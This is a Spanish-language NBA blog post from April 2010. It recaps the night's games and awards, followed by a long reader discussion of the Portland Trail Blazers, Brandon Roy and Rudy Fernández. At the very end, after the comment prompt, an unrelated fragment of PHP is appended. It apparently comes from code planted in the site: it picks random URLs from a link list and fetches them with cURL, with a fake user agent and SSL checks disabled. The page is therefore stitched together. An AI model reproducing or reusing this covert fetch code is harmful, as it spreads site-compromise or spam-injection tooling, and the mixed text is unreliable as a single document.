La Crónica (06/03/2010)

07 de April de 2010 por txusma

Cosas interesantes de la jornada de anoche, siguiendo nuestros mismos apuntes que dimos el lunes:

Los Hawks perdieron el partido que se podían permitir perder y lo hicieron ante unos Bobcats que se ponen a un paso de confirmar su plaza de postemporada. La defensa de los Hawks no fue la de otras tardes y Gerald Wallace se puso las botas. Lo malo es que los Celtics no supieron agradecer el regalo y se pegaron un batacazo de campeonato en el Madison. Lo peor no es que los verdes se confabularan para cuajar un partido mediocre (sobre todo Rondo), ni siquiera que dejaran a Gallinari hacer y deshacer a su antojo. Lo peor es que lograron hacer parecer a un tal Earl Barron al Tim Duncan de sus mejores tardes. Si no preocupaba suficientemente la defensa interior verde de cara a los próximos playoffs anoche se lucieron.

En el otro duelo fundamental del Este, los Raptors se dejaron levantar otro partido en la segunda parte. En esta ocasión lo hicieron con mucha honra, con Bosh en el hospital con la cara partida de un codazo y dando la cara (las sanas) contra los temidos Cavaliers. Sin embargo los Bulls no fueron capaces de empatar la clasificación, perdiendo en un partido muy mediocre contra unos mermados Bucks.

El espectáculo con mayúsculas lo vimos en Salt Lake City. Parecía imposible que se pudiera parar a Durant anoche, máxime si contaba con la inestimable ayuda de Westbrook y con canastas de Jeff Green a cada cual más decisiva. Hizo falta la mejor versión de Boozer, una prórroga y un partido inolvidable de Deron Williams con buzzer-beater incluido para que los Jazz se llevaran el gato al agua.

En el resto de partidos con menor lustre: los Wizards estropearon el intento de récord de victorias de Don Nelson; los Spurs ganaron a los Kings, los Rockets a los Grizzlies y los Pistons a los Sixers en choques sin más historia.

PREMIOS

MVP: El gran partido disputado en Salt Lake City ha provocado que los dos mejores jugadores de la jornada sean de la ciudad mormona. Deron Williams repartió 10 asistencias y anotó 42 puntos, incluyendo 2 que ponían a su equipo por delante a falta de 1 segundo para el final de la prórroga. Carlos Boozer fue el complemento perfecto con 28 puntos, 15 rebotes y 5 asistencias.

Rookie: Buenos partidos de dos clásicos por esta sección como son Stephen Curry y Tyreke Evans. 27 puntos el de los Warriors y 22-9-6 el de los Kings.

Sorpresa: De nuevo una pareja del mismo equipo. Javale McGee y Shaun Livingstone aprovecharon el espectáculo en que se convierten los partidos frente los Warriors y consiguieron 25 puntos y 15 rebotes, el primero, y 21 puntos, 8 asistencias y 5 rebotes el segundo. Nos alegramos especialmente por el ex de los Clippers. Pero para sorpresa la de los 17 puntos y 18 rebotes de Earl Barron. ¿Alguien sabía que jugaba en los Knicks?

Decepción: Tremenda mala suerte la de Chris Bosh y los Raptors. El de Georgia Tech tan solo pudo disputar 2 minutos antes de partirse literalmente la cara con el codo de Antawn Jamison. En el peor momento posible, sin duda. En otro orden de cosas, hay que ver lo desapercibido que ha pasado la temporada Elton Brand. Anoche jugó 13 míseros minutos en los que anotó 6 puntos y cogió 2 rebotes.

Esfuerzo en vano: Anotar 45 puntos y ver como tu equipo pierde no es muy frecuente pero Kevin Durant ha tenido el placer de unirse a la lista de jugadores que anotan más de 40 puntos y no se ven recompensados. Lo increíble es que su compañero Russell Westbrook se fue a los 27 puntos, 9 asistencias y 5 rebotes. Ni así lo consiguieron.

Comenta

32 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    jojojojo
    Salt “Laker” City!!!
    como te oiga algun fan de Utah le da un patatús

    por cierto, creo que Durant ya estaba en la lista de jugadores que anotan más de 40 y pierden

      Citar

  2. Love Denise dice:
    #2

    y el reloj va atrasado una hora y en el comentario de deer pone 06/ 03/ 2010 🙂

      Citar

  3. TheDeerHunter dice:
    #3

    es que lo que tú no sabes es que yo tengo en mi poder la máquina del tiempo

      Citar

  4. kantonyo dice:
    #4

    Recordar que no se llama Kevin Durant, se llama el “puto Jordan”, como dijo Garnett

      Citar

  5. Txusma dice:
    #5

    Ya me sonaba que Durant estaba en la lista junto con Carmelo y Ellis pero no estaba seguro… “Salt Laker City”, ni hecho aposta!

      Citar

  6. Love Denise dice:
    #6

    sobre Toronto, Turkoglu se consolida como reserva, y Jack sigue comiendole la tostada a Calde. Parece que los Bulls y los Raptors están peleando por no entrar en playoffs.

      Citar

  7. pcerezo dice:
    #7

    Ayer recordé la mítica frase de Daimiel: “Y Dios se volvió a disfrazar de jugador de Baloncesto”…pensaba en Messi y seguro que lo hubiese dicho el gran Antoni.

    Futbol aparte…tengo la sensación, ya lo dije la semana pasada, está escrito, que Bulls y Raptors tienen muy poquitas ganas de palmar 4-0 con Cleveland y seguro que alguno por soberana paliza. A casa, la loteria y Bosh y alguno preparar el futuro en otra franquicia. Como también dije en noviembre Turkoglu y Bargnani deben estar besando los pies de la Sra. Collangelo, porque vaya tela los contratitos que se han sacado…y decimos de Vujacic y Walton, lo de estos es de traca…

    Pregunta: Stephen Curry es tan bueno? o es bueno en GSW? Sería bueno en otro equipo?. Viéndolo me parece el jugador de mayor talento, por lo visto hasta ahora, de entre los rookies del año.

    Me encantó Garnett cuando dijo lo del “Puto Jordan”…tenía razón…jjj

    Un saludo a todos

      Citar

  8. Txusma dice:
    #8

    Que futuro le queda a Toronto ahora que parece que Bosh se larga? Los contratos de Calderon, Barganani y Turkoglu son una losa enorme…
    Y la pregunta de Stephen Curry es muy oportuna. Yo dudo de que hiciera los mismos números que está haciendo en los Kings, por ejemplo. La locura de Nelson es lo que tiene.

      Citar

  9. sergio dice:
    #9

    Muchos barian sus números como Curry, Evans, Lee, Stoudamire, Carmelo, Bosh, Mayo, Randolph,… y otros subirian como Harris, Brook Lopez, Hamilton, Beasley, Rose, Igoudala o Roy,…. y no quiero pensar en las barbaridades que podria hacer un Wade en los Warriors.

    Pero eso es mucho suponer creo yo, ¿no?

      Citar

  10. LEmontus dice:
    #10

    Curry es y será un gran jugador aunque sus números estén inflados por GSW

    Lo de bulls es increible es la mayor banda de la nba, otro equipo que vive de lo que hagan rose hinrich y deng y el magnífico Noah que se pega con todos y lo da todo por cada rebote.

    Lo de barron cuando vi el boxcore y veo sus números y los de sergio me puse a ver un rato el partido hasta que empezó Bucks y me sorprendió pero creo que será una simple anécdota.

    El que tiene un potencial increible es Blatche(puede ser una de la estrellas de la próxima temporada, además parece que livingston está recuperando su nivel, este equipo puede ser un gallito el año que viene habrá que ver como se lo montan. Al que creo que están sobrevalorando es Mcgee, un paquete físicamente bueno como tantos. Malo técnicamente, no es un portento para el rebote…. yo no veo que sea parte del futuro de este equipo.

      Citar

  11. Txusma dice:
    #11

    Lemontus, yo diría que si hay algo bueno q tiene McGee es sin duda el físico. Creo que se lo leí a Marc Gasol en su blog.
    A Blatche le falta tanta cabeza…

      Citar

  12. Love Denise dice:
    #12

    hey lemontus, jennings ha dicho en su twitter que sería justo que Skiles fuese elegido Entrenador del Año, supongo que estarás de acuerdo, no? Yo, a pesar de la buena temporada de Bucks, se lo daría a Brooks el de los Thunder.

      Citar

  13. LEmontus dice:
    #13

    Txusma es que no he puesto comas, quiero decir que es un un portento físco( por supuesto ,es lo que le caracteriza) pero luego es un paquete no tiene ganchos , ni movimientos, ni tiro(y aun así se pega tiros medios) y encima no es un tio de 10 rebotes por partido. Y he leido en varios sitios que futuro de wizards pero que no se equivoque no creo que pueda dar más de sí. Perdón por la mala expresión(aunque eso no hace falta que lo diga marc es algo que salta a la vista).

    Hombre yo obviamente se lo daría a Skiles aunque pienso que el año que vine va a darse un bacatazo de los buenos, el rendimiento que ha sacado a la plantilla, confiar en jennings(incluso en ese mes y medio que no le entraba una)…. y dejar a bucks 6 de conferencia (salvo castrastofe) creo que se lo merece.
    Sunders lo ha hecho tambien bien en oklahoma pero quizás el facto Durant le haya falicitado bastante el trabajo, ahora sí okalahoma e sun equipo con las cosas claras y que sbe muy bien lo que hace. Además el año de confirmación westbrook, y luego porsupuesto el rendimiento que ha sacado a su plantilla(thabo,ibaka…).

      Citar

  14. sergio dice:
    #14

    Creo que lei en un articulo que McGee era el jugador de la NBA que podia realizar un mate desde mayor altura en toda la historia… ¿o era este año?. El caso es que salta como nadie para la altura que tiene… pero actitud en el juego… poquita

      Citar

  15. TheDeerHunter dice:
    #15

    Leo las últimas noticias sobre Rudy y me pongo malo.
    Me pregunto si también puede ser considerado chauvinista el apuntar con el dedo a McMallon de esta situación. El mejor jugador de Europa hace dos años, uno de los mejores rookies por minuto el año pasado… y ahora esto.
    La gestión de la plantilla del “coach” es de vómito.

    Resultado es resultado y más si hay excusas de por medio… hasta que deje de serlo, McMallon.

    Los Blazers no van a comerse un rosco en la vida mientras el equipo lo dirija el barraquero ese… y si por el camino pierden un jugador de la talla de Rudy no se lo deberían perdonar nunca.

      Citar

  16. pcerezo dice:
    #16

    5 años y no ha pasado una sola ronda de draft y este año lo tiene más crudo todavía aún con Oden dudo que la hubiesen pasado. El Roysistema no da para más. Ni Kobe Bryant fue capaz de hacerlo él solo.

      Citar

  17. sayim dice:
    #17

    Con todos mis respetos Roy no estará nunca ni cerca de Bryant…

    Yo también pienso que el principal problema de los Blazers está en el banquillo, pero tampoco creo q se movieran demasiado bien en los despachos los ultimos años:
    -Draft de Oden en vez de Durant (ya se que no se podia esperar las evoluciones de ambos, pero se supone q los GM saben de esto mas que nadie, yo desde q es rookie pensaba q Durant iba para crack)
    – Miller y Roy en el mismo equipo??? Para mi no mezclan bien…
    – Traer a Camby a media temporada. ¿para que? para palmar 4-0 o 4-1
    Cuantos jugadores de perfiles parecidos tuvieron este año en la rotación?? Un monton de escoltas y aleros bajos… y para ir al rebote? y la defensa interior? en manos de dos pivots con historial de lesiones… Porque estos no son precisamente los fuertes d Aldridge (un jugador q por otra parte me encanta…)

    De ser un equipo muy prometedor, parece que otros les han adelantado por la derecha… Tal vez con un revulsivo (desprenderse de Roy?? que podrían conseguir por el???) vuelvan a coger el camino correcto

      Citar

  18. pcerezo dice:
    #18

    Nadie esperaba las lesiones de Oden. A toro pasado me parece muy ventajista. Ellos necesitaban el pivot y todos pensábamos que iba a ser más o menos dominante y que iba a cubrir las necesidades que tenían. Creo que esa elección no es el verdadero fallo.

    Yo creo que sería un gravísimo error desprenderse de Roy. El problema es la cantidad de balón que el entrenador le ha dado a Roy. Roy va a evolucionar a un jugador más completo tal y como han hecho otros escoltas y sabrá decidir los momentos en los que tiene que jugar a más puntos y los que tiene que jugar a más asistencias. El problema de ahora es que solo juega a más puntos y en momentos claves (es un muy buen jugador de tiros decisivos) de PO los equipos conocen hacía donde va la bola por decreto.

    Yo creo que en Portland necesitan un cambio de entrenador, aire fresco…

      Citar

  19. kantonyo dice:
    #19

    Hay cosas en las que no estoy de acuerdo en el tema de Blazers.

    Creo que Roy hoy por hoy es insustituible, su juventud (25), caracter y talento etc etc, pocos jugadores están ahora mismo a su altura en estos aspectos. Creo que en esto no deberia haber ni siquiera debate, el chaval cobra hasta ahora 3,9M $. Fue un acierto total del GM anterior a Kevin Pritchard en un año que se eligió por encima a Bargnani,Morrison, Tyrus Thomas o Shelden Williams.

    La elección de Greg Oden como número 1 fue lógica, nadie en ese momento criticó su elección después de una gran temporada en la NCAA y de su potencial físico como pívot dominante en la pintura. Como tampoco creo que nadie duda de la elección de Blake Griffin como número 1 de este año a pesar de su grave lesión, por mucho que luego Evans, Curry u otro se conviertan en un Durant en el futuro. Y no quiere decir esto que no pensaramos que Durant iba a ser un crack, sino que Oden era en ese momento una sensación en USA.

    Estoy de acuerdo en que esta plantilla se ha desaprovechado, en que Rudy es un monigote, hace la misma función que el palo en los corners de fútbol y que el chico ha perdido con razón la paciencia.

    Pero también pienso que si Portland no hubiera tenido tantos problemas de lesiones ahora mismo estaría top3 en el Oeste, y que un equipo: Miller. Roy, Batum, Aldridge, Camby – Webster, Rudy, Bayless. tiene galones suficientes como para optar a una segunda ronda. En este momento es 6º a tres victorias del segundo puesto, con todo lo que ha pasado!!!

      Citar

  20. Love Denise dice:
    #20

    parece que hay un principio de acuerdo para que Ginobili renueve con los Spurs por 3 temporadas y 39 kilos.

    Mcmillan puede tener parte de culpa en lo de Rudy, pero por qué Rodolfo no se salta alguna vez el sistema, coge el balón e intenta una penetración o cualquier cosa que no sea un triple, si Mcmillan lo castiga por ello, mejor, más opciones para ser traspasado el próximo año.
    Yo creo que Rudy es que no quiere seguir en la NBA, ni en Portland ni en otro equipo, pienso que su deseo es venir a Europa (un tal Floren estaría encantado), ser el lider de un buen equipo anotando 20 puntos por partido y cobrando 3 kilos de €.

      Citar

  21. LEmontus dice:
    #21

    Rudy es un crak eso está claro pero no tiene mentalidad de estrella, como dice denise no le da por demostrar que es más que un triplista…. Y esas declaraciones de que echa de menoes el basket europeo…. ya va a rendirse? Me decepcionaria que un tío con sus características se rinda de esa manera.

    Yo también pienso que Roy es insustituible, y no estará cerca de bryant(¿quien está cerca de bryant?) pero es una estrella que perfectamente puede meterte todas las posesiones de los últimos dos minutos por ejemplo de tu equipo, es uno delos mejores anotadores, un crak que puede ser perfectamente jugador franquicia.

    Además si no hubiera tenido lesiones estarían mas arriba a buen seguro oden estaba haciédolo muy bien y eso es lo que les hacía falta.

    El problema además del entrenador ha sido la adquisición de andre miller, que no es que sea malo pero no encaja en ese equipo quizás con otro base fueran mejores. Yo de todas maneras no pienso ni mucho menos que estén sentenciados, Miller Roy Batum Albridge(esta a un paso de ser importante en la liga) Camby este equipo con los tiradores desde el banquillo y oden hubiera dado mucho que hablar.

    No les pronostico una paliza en PO.

      Citar

  22. TheDeerHunter dice:
    #22

    Lo de traspasar a Roy sería ya el colmo… pero tengo dudas sobre cómo deberíamos calificar un hipotético traspaso de Oden.
    Con Rudy ni comen ni dejan comer… pero hace no mucho oí a Rudy que sí quería seguir en la NBA. No sé si será verdad o mentira, por supuesto.

    No sé si Portland, en condiciones normales, sería tanto top 3… pero es difícil imaginarlos por debajo del top4. Sigo diciendo que el objetivo debería ser 2ª ronda… incluso con las excusas de por medio quizá ya hayan cumplido. Para mí el problema es el juego, la filosofía mediocre del resultadismo extremo y de la defensa por encima de todo. Incluso todo esto para mí no sería el problema de contar con jugadores con menos talento. Y era músculo lo que pedía McMillan para este año…

    Ya se ha cargado a Sergio, Blake (curioso) y Outlaw… puedo entenderlo y digerirlo. Intentó cargarse a André Miller y eso lo digiero mucho menos. Que se cargue a Webster como se lo está cargando lo veo despreciable… pero lo de Rudy un absoluto pecado baloncestístico. Los querría a ambos para los Lakers. Lástima que sólo tengamos para canjear a Vujacic y Morrison.

    Lo de que Portland alcance la 2ª ronda lo veo casi ciencia ficción, por cierto.

      Citar

  23. TheDeerHunter dice:
    #23

    Ah, y con McMillan… el único que puede hacer lo que le salga del bolo es Roy.
    Ir contra él abiertamente sería un suicidio profesional en la NBA, a no ser que seas una estrella consagrada como André y/o tengas la suerte de que no le queden más narices que utilizarte, como ha sucedido esta temporada también con André.

      Citar

  24. sayim dice:
    #24

    Pues para mi Portland es candidato claro a un rosco este año en PO (me sorprenderia incluso un 4-1) incluso aunque eviten a lakers y el problema es que no veo de que manera puede dar ese salto d calidad (a no ser q oden rompa a ser un jugador dominante…). Esta claro que la culpa de que Roy disfrute del 70% de las posesiones en sus manos es del entrenador, pero Roy debería hacerselo mirar… Y puede que le tenga algo de manía, pero yo no lo quiero de jugador franquicia en mi equipo, a pesar de que reconozco q es uno de los mejores anotadores de la liga

      Citar

  25. Txusma dice:
    #25

    Diría que el año de que McMillan hay defenestrado a Sergio y esté defenestrando a Rudy te provoca la mania hacia Roy. Yo tb creo que es un auténtico crack y pienso que detrás de Bryant y Wade es el mejor escolta d la liga. Si tu entrenador te da el 70% de los balones que has de hacer tu? Devolverlos? Pq razón no juzgamos a Wade por el mismo rasero?

      Citar

  26. TheDeerHunter dice:
    #26

    De entrada, Roy a su lado tiene a Batum, Webster, Rudy, Bayless, André, Camby, Aldridge…
    Wade a su lado tiene a Arroyo, a Jermaine Oneal (que ni siquiera es el otro del otro) a Quentin Richardson que han tirado hasta de su casa, al bluf de Beasley y potencias ofensivas como Joel Anthony, Magloire, Cook… hasta Dorell Wright parece bueno en esa banda.

    A mí Roy me parece un jugadorazo como la copa un pino, pero se equivoca si se cree que lo de “balones a Roy” va a beneficiarle. Otros antes que él han caído en el mismo error (el propio Kobe)

      Citar

  27. Txusma dice:
    #27

    Lo gracioso del tema es q hay 17 jugadores que tiran más veces por partido que Roy. Pq entonces tenemos la sensación de que Blazers siempre juega con “balones a Roy” y en cambio no pensamos lo mismo de Lakers (Kobe), Nuggets (Carmelo), Thunder (Durant), Pacers (Granger), Mavs (Dirk), Hawks (Joe Jonhson)… Sigo?

    pd: el q más tira es Monta Ellis pero es q este, aún con todo lo bueno que es a veces me da la sensación de que se ha vuelve loco en algunos momentos.

      Citar

  28. TheDeerHunter dice:
    #28

    Cuidado, porque no estamos hablando de número de veces que tira un jugador en valor absoluto, pues en ese caso se intoxica la comparación en cuanto el resto de equipos lanza más (o mucho más) que Portland (vaya noticia!!!)

    Tampoco recoge el dato el porcentaje de la jugada que permanece en manos de Roy, o el número de jugadas distintas sobre el total que se basan en que él haga y deshaga, o cuanto tiempo juega o se sienta…

    Pero lo más importante es que el dato no recoge cuantos lanzamientos o jugadas podrían hacer en condiciones unos compañeros que en absoluto son mancos de talento.
    Para mí es mucho más punible que no puedan apenas lanzar a canasta o generar juego un Webster o un Rudy que que no lo pudieran hacer en su día un George Linch o un McKey (que tampoco eran completamente mancos en el lanzamiento puro)

    De todas formas… aquí voy a reconocer que hace algún tiempo que hablo de oído… porque es oír el nombre de los Blazers y yo cambio de canal o me voy a dormir. Paso de perder el tiempo viendo ese “espectáculo” (por llamarle de alguna manera)

      Citar

  29. Txusma dice:
    #29

    Mira, da la casualidad que Basketball-Reference aporta un dato que es una estimación del porcentaje de jugadas que “utiliza” un jugador del total del equipo mientras esta en la cancha. Tiene en cuenta los tiros del campo y las perdidas tanto del jugador como del equipo.
    Te dejo la lista de la 2009-2010: Wade, Lebron, Carmelo, Kobe, Arenas, Durant, Ellis, Bosh, Granger, Dirk, Hamilton, Jackson, Amare, Kaman, Rose, Roy… (Como curiosidad Pau Gasol es el 95)
    Ya te digo que creo que a Roy le habéis cogido algunos una tirria especial pq Sergio y Rudy estan o han estado en los Blazers. Y a mi me vais a perdonar pero, absolutamente nada de culpa tiene el propio Rudy de los desastrosos partidos que se marca de vez en cuando? En los últimos 5 partidos ha anotado 6 puntos en total tirando 19 veces…

      Citar

  30. TheDeerHunter dice:
    #30

    1.- De manía a Roy por mi parte ninguna. Me parece un jugador exquisito… a todo lo más infrautilizado por un corsé que le hace ser menos peligroso de lo que es.
    2.- ¿porcentaje de jugadas que utiliza el jugador tiene en cuenta tiros y pérdidas? Ahora mismo no sé a qué dato te refieres… pero en este caso no puedo sino desconfiar de esa estadística. La manera en la que Roy influye en el juego de su equipo me parece evidente, más allá de tiros y pérdidas. En mi mensaje anterior ya te decía que ninguna estadística recoje ciertos aspectos que ponen en evidencia el Roy-sistema.
    No he visto jugar en toda la vida a Kobe de base tantos minutos como en estos pocos años de carrera de Roy, por ejemplo. Sólo es otro dato significativo. Hay muchos más.
    Hazme el favor y busca el porcentaje de buzzer beaters que se juega Roy de su equipo. En Lakers he visto lanzarlos este mismo año a Fisher y Artest… y eso que Kobe ha metido más que nunca.
    3.- Hasta ahora era Sergio… ahora le echamos la culpa a un jugador que ya lo ha demostrado todo como Rudy, incluido un nivel defensivo envidiable y en este mismo equipo. Me pregunto qué narices ha demostrado McMillan además de hacer el juego más feo de todos los equipos playoff. 19/5= menos de 4. Si sólo fueran estos partidos te daría la razón… pero es que Rudy ya se puede dar un canto en los dientes por tirar 4 cada partido. Lo normal es hacer un 0/2… en muchos casos en pases desesperados que le caen en suerte como tirador puro que no es.
    4.-Este equipo no tiene jugadores rápidos… tiene misiles. Ni un puto contraataque he visto en años.
    5.- Vuelvo a insistir que no es asunto de Rudy o de Sergio. Ellos sólo son aquí el exponente. Hemos visto este año regalar un número indeterminado de victorias sólo por ser tan cerril de poner a Blake antes que André Miller. El mismo Blake que a las primeras de cambio han dado boleta cuando tampoco se lo merecía. El mismo criterio de pedir más músculo y estar a punto de fichar a Turkoglu. Criterio nulo, puro y duro.

      Citar

  31. LEmontus dice:
    #31

    Deer aunque no venga mucho al tema los buzzer beaters son y deben ser SIEMPRE para las estrellas que ya pueden estar mal poscionado o no haber metido una en todo elpartido que tiene mas posibilidades de emterla que otro jugador. Si no recuerdo mal artest y fisher fallaron(artest seguro fisher no recuerdo). Miles y Miles de veces hemos visto tirar pedradas o tiros que ni tocan aro de buenos tiradores en el ultimo segundo. Yo soi de los que piensa que el ultimo tiro debe de ir para la estrella y más si se llama Brandon roy.
    En cuano a portland está claro que mc millan no tiene es buen entrenador pero no podeis criticar lo que es por nombres un equipazo como estais haciendo y como ya se ha dicho que si tuviera a oden podría estar por encima de suns o utah perfectamente. Creo que el único que merece críticas es Mc Millan y no un roster potente como del e portland.

    Por cierto yo también pienso que blake sobre todo por su rendimiento del año pasado no debería haberse ido.

      Citar

  32. TheDeerHunter dice:
    #32

    Pues como norma general sí, pero no como ley inamovible… porque al final te haces previsible (y lo hemos visto ya con Roy varias veces)
    El mismísimo Jordan no dudó en dársela a Paxson, a Kerr o a quien sea para jugársela en una finalísima.
    El año pasado sin ir más lejos el buzzer beater del año lo metió Fisher (y no fue uno sólo)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>